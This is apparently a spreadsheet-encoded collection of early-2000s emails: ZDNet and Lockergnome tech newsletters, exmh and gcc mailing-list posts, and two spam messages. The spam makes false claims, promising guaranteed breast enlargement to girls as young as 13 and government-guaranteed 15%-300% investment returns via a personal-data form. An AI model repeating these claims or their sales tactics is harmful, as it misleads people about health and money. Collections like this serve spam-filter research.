 PC e740&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/front=
 page/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;b=
 &gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc7-KG43QLPWxedmZi1=
 NWtUoF24wxeeR" style=3D"text-decoration:none"&gt;Palm m515&lt;/a&gt;&lt;br /&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" h=
 eight=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3Ddc-40zzQ0Lr5OUv8T7Bz6gEwTinhlyR" style=3D"tex=
 t-decoration:none"&gt;Palm Vx&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphi=
 cs/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"=
 0" /&gt;&lt;br /&gt;      &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Df1-MtTuQpsFEcOnoIWH3XX8owMnerlR" style=3D"text-decoration:none"&gt;Compaq i=
 Paq H3835&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fro=
 ntpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;i=
 mg src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D=
 "8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3D07-HqCzI5rq9Ttex1IiqzUbrvLkiDeR" style=3D"text-decoratio=
 n:none"&gt;More popular PDAs&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;    &lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;br /&gt;    &lt;/font&gt;&lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" width=3D"10" height=3D"1" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;/table&gt;   &lt;/td&gt;   &lt;/tr&gt;   &lt;tr v=
 align=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;tr&gt;&lt;td colspa=
 n=3D"7" bgcolor=3D"#999999"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;/table&gt;   &lt;!-- /#=
 ## --&gt; &lt;table cellpadding=3D10 border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D1c-cs_iIFr43m3vweqn9kgGa2oXqGyR"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://clickthru.online.com/Click?q=3D31-V_YRIjMsD070C6syLxjkqVAXXblR" &gt;&lt;b&gt;WiFi=
  nets: Stop sharing!... iPod for Linux... Super-sized notebooks&lt;/b&gt;&lt;/a&gt;&lt;br&gt;=
 Cable companies are demanding that customers stop sharing their high-speed =
 Net access over wireless networks. Plus: Linux users may soon be able to ac=
 cess Apple's iPod. And Toshiba unveils a fashionably large notebook. &lt;/font=
 &gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;ROBERT VAMOSI&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/231.gif" alt=3D"ROBERT VAMOSI" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D46-19zwInp=
 DSNbqQdfa1cN0535V0Y9R" &gt;&lt;b&gt;Why cyberterrorists don't care about your PC&lt;/b&gt;=
 &lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" =
 width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Forget about viruses. America's real cybersecurity concerns=
  are the notoriously vulnerable computer systems that control our power and=
  water supplies. But Robert has a few ideas about how to keep the infrastru=
 cture safe.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3D5b-5LOwIBK=
 DUXll6LHxCjjvDSwizzcR" &gt;&lt;b&gt;Guilty pleasures: 3 top politically incorrect ga=
 mes&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clea=
 r.gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Sometimes you just want to kick back and drive drunk, commi=
 t a few crimes, or blast some innocent critters to smithereens. Preston's g=
 ot three raucous downloads that let you do all that and more--from the safe=
 ty of your PC.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D71-GwdUIEZcfHsVIdLqwuBXvl3=
 NU2FR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D86-8fH1QCJonnkOBRzSjaeTldfVpf4R"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rl_login?email=3Dqqqqqqqqqq-zdnet@example.com&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3D9b-7-wFrkI=
 01-XWd1epIp_ntlyl0U4hTsRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@example.com&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3Db0-NZmfQQJr-S9Xef6dxQMKtNX8PQiR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc5-8BcDQzOaF=
 -czAJ_zSROUJEymxqPR"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href=3D"http://clickthru.online.com/Click?q=3Dda-dT8jQUPq=
 _no59sjbjsMVKpv3DxnR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Def-04uYQmkHvFV_1BKqBxDV=
 AmoBameR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D04-k9W0IFQXFQWZUdA98BbBL7kOi_yR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D19-BLe0I2rXOrS=
 MMmlKMZ2Fz8IR7XlR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D2f-hYaFIqnzAabljf5P26D_8gaZjMeR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D44-9nxfIZUtYM2hh7gEMLKlXBDgnVsR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53oIEnthMngw3YlpW-B_=
 KMqztFR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D6e-2aYjIyES2bZIfb9QA5K-fxuEL59R" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D83-U-BXQYJ=
 7lF1q8ghtuoAABMMPZ9rR"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NL=3De501-01&amp;ISSUE=3D2002-07-10" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D98-F=
 TtO-Wz561wnRdZcPOtuqPuNnsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bigger, Fuller Breasts Naturally In Just Weeks! uqouq
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;&lt;/head&gt;
 &lt;body bgcolor = pink&gt;
 &lt;b&gt;For women ages 13 to 60 plus....&lt;/b&gt; 
 &lt;BR&gt;&lt;BR&gt;As seen on TV....
 &lt;BR&gt;Safely Make Your Breasts
 &lt;BR&gt;Bigger and Fuller 
 &lt;BR&gt;In the privacy of your own home.
 &lt;BR&gt;&lt;BR&gt;&lt;B&gt;Guaranteed quick results&lt;/B&gt;
 &lt;a href = "http://www.opps.info/john/" 
 OnMouseover="window.status='Bigger, Fuller Breasts!';return true" 
 OnMouseout="window.status='Bigger Breasts Naturally!';return true" 
 OnMouseDown="window.status='Bigger Breasts In Just Weeks!';return true" 
 OnMouseDown="window.status='Bigger Breasts As Seen On TV!';return true" 
 OnClick="window.status='Bigger Breasts Without Surgery!!!';return true"&gt;
 Click Here For Full Report&lt;/a&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 mcskjfirglkckubuvfiwwp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</si>
  <si>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--==_Exmh_-694865624P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Sat, 24 Aug 2002 18:56:05 +0700
 &gt;
 &gt;     Date:        Thu, 22 Aug 2002 10:04:06 -0500
 &gt;     From:        Chris Garrigues &lt;cwg-dated-1030460647.7351a3@DeepEddy.Com&gt;
 &gt;     Message-ID:  &lt;1030028647.6462.TMDA@deepeddy.vircio.com&gt;
 &gt; 
 &gt;   | hmmm, I assume you're going to report this to the nmh folks?
 &gt; 
 &gt; Yes, I will, sometime, after I look at the nmh sources and see what
 &gt; they have managed to break, and why.
 &gt; 
 &gt; But we really want exmh to operate with all the versions of nmh that
 &gt; exist, don't we?   The patch to have exmh do the right thing, whether this
 &gt; bug exists, or not, is trivial, so I'd suggest including it.
 &gt; 
 &gt; Patch follows ...
 &gt; 
 &gt; I have no idea why the sequences were being added after the message list
 &gt; before, not that it should make any difference to nmh (or MH).   But since
 &gt; I stopped doing that, the variable "msgs" isn't really needed any more,
 &gt; rather than assigning $pick(msgs) to msgs, and then using $msgs the code
 &gt; could just use $pick(msgs) where $msgs is now used.   This is just a
 &gt; frill though, so I didn't change that.  
 I'll fix this in CVS this afternoon.
 Thanks,
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-694865624P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ajtDK9b4h5R0IUIRAlFjAKCJRCAKR2dkmh5oqHfkagDddfmrBwCdH6vv
 FCRlUSeu14edQaoD4yCWoDQ=
 =+lzS
 -----END PGP SIGNATURE-----
 --==_Exmh_-694865624P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul Kelly mentioned:
 &gt; gcc has been as good as or better than pgcc for quite a while. pgcc was
 &gt; was written back in the days when gcc splintered due to a perception of
 &gt; slow progress on the main branch. A number of Linux distributions wound
 &gt; up using egcs, partly derived from the pgcc work as I recall. Happiness
 &gt; was restored to the world with gcc 2.95 and later.
 I do not have the time to follow the compiler "wars", but I notice that I
 must use egcs to build 64 bit SPARC code.
 GCC 3 should do it, but because it is so "buggy"[1] it is not worth trying
 to use unless you really want to track down those compiler errors... :(
 - Matthew
 [1] "buggy" in the sense that its a feature. Many of the problems with GCC 3
 seem to be related to stricter syntax checking. More accurate information
 will be appreciated.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</si>
  <si>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Subject: Government Guarantees Your Success
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
   &lt;title&gt;Secured Investements
   &lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;&lt;font face=3D"Times, New Roman"&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;table width=3D"625" border=3D0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
     &lt;td align=3D"center"&gt;&lt;b&gt;&lt;font color=3D#000033 size=3D6&gt;Earn 15%-300% I=
 nterest On Your Money&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
   &lt;font color=3D#ff0000 size=3D5&gt;&lt;b&gt;GUARANTEED&lt;/b&gt; BY THE GOVERNMENT!
   &lt;/font&gt;&lt;/center&gt;&lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;
 &lt;p&gt;
 &lt;table width=3D"500" border=3D0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
     &lt;td align=3D"center"&gt;&lt;font color=3D#000033 size=3D4&gt;&lt;b&gt;&lt;u&gt;Government S=
 ecured Tax Cerificates Provide:&lt;/u&gt;
     &lt;/p&gt;&lt;/tr&gt;&lt;/td&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;
 &lt;table width=3D"510" border=3D0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
     &lt;td align=3D"left"&gt;&lt;font color=3D#000033 size=3D3&gt;
 &lt;li&gt;The highest guaranteed interest returns compared to any other investme=
 nt.
 &lt;li&gt;A return up to 100 times your money backed by government secured prope=
 rty.
 &lt;li&gt;Security in your investment that the stock market cannot compare to.
 &lt;li&gt;Real estate for pennies on the dollar!
 &lt;/p&gt;&lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;p&gt;
 &lt;table width=3D"450" border=3D0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
     &lt;td align=3D"left"&gt;&lt;font color=3D#000033 size=3D4&gt;&lt;b&gt;America's largest=
  single source
   of information/education for the government tax industry.  Celebrating o=
 ver
   12 years of providing quality, leading edge education for the serious en=
 trepreneur &amp; investor.
 &lt;/p&gt;&lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D"530" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"middle"&gt;&lt;FONT color=3D#000033 size=3D4&gt;&lt;B&gt;Receive your&lt;/f=
 ont&gt;&lt;/b&gt;&lt;FONT color=3D#ff0000 size=3D4&gt;
   &lt;b&gt;FREE&lt;/b&gt;&lt;/font&gt;&lt;FONT color=3D#000033 size=3D4&gt;&lt;b&gt; video of &lt;/b&gt;&lt;FONT =
 color=3D#ff0000 size=3D4&gt;"INSIDER SECRETS OF INVESTING
   IN GOVERNMENT SECURED TAX CERTIFICATES."&lt;/FONT&gt;&lt;br&gt; 
   &lt;Font size=3D3 color=3D#000033&gt;(Over 90 min. of inside strategies, a $39=
 95 value)&lt;/font&gt;&lt;/b&gt;&lt;/tbody&gt;&lt;TR&gt;&lt;/TABLE&gt;
 &lt;br&gt;
 &lt;p align=3D"center"&gt;
 &lt;table width=3D250 border=3D0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
     &lt;td align=3D"center"&gt;&lt;font color=3D#000033&gt;&lt;b&gt;Fill out the &lt;i&gt;no oblig=
 ation&lt;/i&gt; form below for more information.
     &lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;P&gt;
 &lt;TABLE width=3D"400" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"center"&gt;&lt;FONT color=3D#000033 size=3D2&gt;Required Input Fie=
 ld&lt;/font&gt;&lt;font color=3D#ff0000 
     size=3D2&gt;*&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"middle"&gt;
       &lt;FORM action=3Dmailto:inbocks_tg6@yahoo.com?subject=3DInvestment_Inq=
 uiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3D"right" width=3D"50%"&gt;&lt;font face=3D"Times, New Roman=
 " 
             color=3D#000033 size=3D2&gt;Name&lt;/FONT&gt;
             &lt;FONT color=3D#ff0000 size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3D"right" width=3D"50%"&gt;&lt;font face=3D"Times, New Roman=
 " 
             color=3D#000033 size=3D2&gt;State&lt;/FONT&gt;
             &lt;FONT color=3D#ff0000 size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DState&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3D"right" width=3D"50%"&gt;&lt;font face=3D"Times, New Roman=
 " 
             color=3D#000033 size=3D2&gt;Day Phone&lt;/FONT&gt;
             &lt;FONT color=3D#ff0000 size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DDay Phone&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3D"right" width=3D"50%"&gt;&lt;font face=3D"Times, New Roman=
 " 
             color=3D#000033 size=3D2&gt;Night Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNight Phone&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;
           &lt;TD align=3D"right" width=3D"50%"&gt;&lt;font face=3D"Times, New Roman=
 " 
             color=3D#000033 size=3D2&gt;Best time to contact&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width=3D"56%"&gt;&lt;FONT color=3D#000000&gt;&lt;SELECT size=3D1 name=3D=
 Best time to contact&gt; 
               &lt;OPTION selected&gt;&lt;/OPTION&gt; &lt;OPTION 
               value=3DMorning&gt;Morning&lt;/OPTION&gt; &lt;OPTION value=3DAfternoon&gt;A=
 fternoon&lt;/OPTION&gt; 
               &lt;OPTION value=3DEvening&gt;Evening&lt;/OPTION&gt;
               &lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3D"right" width=3D"50%"&gt;&lt;font face=3D"Times, New Roman=
 " 
             color=3D#000033 size=3D2&gt;E-mail Address&lt;/FONT&gt;
             &lt;FONT color=3D#ff0000 size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DE-mail Address&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"50%"&gt;
           &lt;DIV align=3D"right"&gt;&lt;font face=3D"Times, New Roman" 
             color=3D#000033 size=3D2&gt;Objective&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
           &lt;TD width=3D"56%"&gt;&lt;FONT color=3D#000000&gt;&lt;SELECT size=3D1 name=3D=
 Objective&gt; 
               &lt;OPTION selected&gt;&lt;/OPTION&gt; &lt;OPTION 
               value=3DSecured_Investments&gt;Secured Investments&lt;/OPTION&gt; &lt;OP=
 TION value=3DBusiness_Opp&gt;Business Opp&lt;/OPTION&gt; 
               &lt;OPTION value=3DNew_Career&gt;New Career&lt;/OPTION&gt;&lt;OPTION value=3D=
 All_of_the_Above&gt;All of the Above&lt;/OPTION&gt;
               &lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/tbody&gt;&lt;/table&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt;
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;TABLE width=3D475 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D000000 size=3D2&gt;&lt;B&gt;*All tax liens and=
  deeds directly support local
       fire departments, police departments, schools, roads, and hospitals.=
   Thank you for your interest and support.&lt;/b&gt;&lt;br&gt;
       To be removed, please  
       &lt;A href=3D"mailto:d_lete90@eudoramail.com?subject=3DRemove_Investmen=
 t"&gt;click 
       here&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/CENTER&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020722.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020722.html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&lt;/style&gt;&lt;title&gt;20020722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href="http://www.lockergnome.com/"&gt;&lt;img src="http://images.lockergnome.com/images/gnomedaily.gif" width="50" height="60" hspace="5" alt="Lockergnome" border="0"&gt;&lt;/a&gt;
  &lt;a href="http://www.gnometomes.com/"&gt;&lt;IMG alt="Download Our eBooks" border=0 width="468" height="60" src="http://images.lockergnome.com/images/ads/gnometomes46860.gif"&gt;&lt;/a&gt;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07.22.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;50 TIPS TO MAKE WINDOWS MORE USEFUL&lt;/b&gt; 
 Do you have to deal with Windows on a daily basis? Might as well 
 maximize your time with it. You'll find that some of these tips 
 will apply to other operating systems, too. The world of computing 
 isn't so mysterious once you understand how it works. With this 
 GnomeTome, you'll begin to work faster - and smarter. 
 &lt;a href="http://www.gnometomes.com/tome/000627.html"&gt;Download Windows Productivity Tips now&lt;/a&gt;!  
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I did a lot this weekend, but I didn't really get much done, 
 ya know? My knees are killing me from hauling stuff out of 
 the basement for storage up in the attic, but the pile only 
 made it as far as the kitchen. Then I stripped and painted 
 the floor where that collection of stuff was previously 
 stored, and erected some shelving so I'd have room for more 
 stuff. I woke up the next morning discover a very sick 
 ferret, likely from the fumes that leeched into the next 
 room over despite the ventilation I had setup to prevent the 
 migration of bad air. So, I ended up dismantling the ferret 
 cage to move it upstairs for a week or so until I'm sure 
 it's safe. Thankfully, all critters are doing well now.
 &lt;p&gt;I also started in on replacing the cheapo rusted screws 
 with stainless steel deck screws out back, but found that 
 the ones I picked up are too weak, leaving me with stripped 
 out heads and bent shafts. That project stopped after barely 
 getting started. The front steps are also in need of rust-
 proof screws, but they are made from much softer wood, so I 
 moved the tools to the other side of the house. Two-thirds 
 of the way through the first row, I found that the extra 
 1/2" on the screws I purchased was too much and I began 
 running into the top of the old concrete steps underneath. 
 Figures. Live and learn. 
 &lt;p&gt;Oh well, it was entirely too hot to work outside anyway. 
 Back down to the basement I went to geek out instead. 
 Roughly an hour into geekitude, I glanced over and realized 
 it was 78.7 degrees in the basement and I was virtually 
 stuck to my chair from the sweat. I shut off as much as I 
 really could and still work on a couple of projects, but it 
 didn't help the heat situation much. It was just too hot 
 outside for the air conditioner to keep up with the added 
 heat from the computers. That left me in need of a shower 
 and with only the notebook in the living room for the 
 balance of the weekend. I cleaned out a lot of ancient 
 email, which was nice, but nothing really got accomplished 
 otherwise. Boy, am I tired. And the weekend is so far away.
 &lt;p&gt;Hey, the second season of M*A*S*H comes out on DVD 
 tomorrow! That should put me in better spirits. I could 
 watch M*A*S*H for hours on end. In fact, I often do just 
 that. The only kink is that the episodes don't play back-to-back 
 from DVD. I'm going to play with AppleScript on the Mac 
 to see if I can customize how the individual discs play. In 
 theory, I should be able to make a disc play all the way 
 through. If I succeed, I'll be sure to share the script 
 technique in the &lt;a href="http://applecore.lockergnome.com/"&gt;AppleCore newsletter&lt;/a&gt;. Too bad I can't do that with a stand-alone DVD player.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&lt;b&gt;Slow File Save Dialog Boxes&lt;/b&gt;
 &lt;br&gt;Pointed out by Ian Hargreaves
 &lt;p&gt;&lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;en-us;q321126"&gt;http://support.microsoft.com/default.aspx?scid=kb;en-us;q321126&lt;/a&gt;
 &lt;p&gt;I've hated this one for a long time, and now we have a 
 hotfix and a workaround, so take your pick as to which will 
 work best. I often map drive letters to specific network 
 shares, and if I happen to have a system turned off, I'll 
 notice a significant delay when clicking the drop-down boxes 
 in Open, Look In or Save In/As dialog boxes. Windows 2000 
 attempts to reconnect to mapped resources before showing you 
 the list, and depending on how many drives you have mapped 
 and how many of those resources are unavailable, it can take 
 eons just to save a file. A workaround is to use the My 
 Network Places functionality instead of mapping drive 
 letters. Fine for some, but I prefer having drive letters 
 mapped for many things, being that I work at a command 
 prompt quite a bit, and it's easier to navigate that way. 
 Alternatively, a hotfix is now available, but you'll have to 
 contact Microsoft to obtain the fix if that's the route you 
 choose.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Customized 9x/ME Blue Screen Errors&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.vsres.com/blscrn/"&gt;http://www.vsres.com/blscrn/&lt;/a&gt;
 &lt;p&gt;We've all seen 'em. Those annoyingly incoherent blue 
 screens indicating a system error of some sort, but provide 
 no real help in solving the problem. If you're a programmer 
 that has had to deal with error conditions produced by 
 Windows 95/98/ME, then this might be a better way to handle 
 them within your applications. Blue Screen v1.21 is an 
 ActiveX control that uses the standard Windows system error 
 functions, but provides a way to pass along text and 
 response options you designate. Note that this is not 
 functional on Windows NT/2000/XP, which handle system errors 
 in an entirely different manner.
 &lt;p&gt;&lt;br&gt;&lt;b&gt;Gamers Beware of Intel 845G Chipset&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.theinquirer.net/?article=4532"&gt;http://www.theinquirer.net/?article=4532&lt;/a&gt;
 &lt;br&gt;&lt;a class="url" href="http://www.theinquirer.net/?article=4513"&gt;http://www.theinquirer.net/?article=4513&lt;/a&gt;
 &lt;p&gt;Discount the AMD hype and returned volley from Intel when 
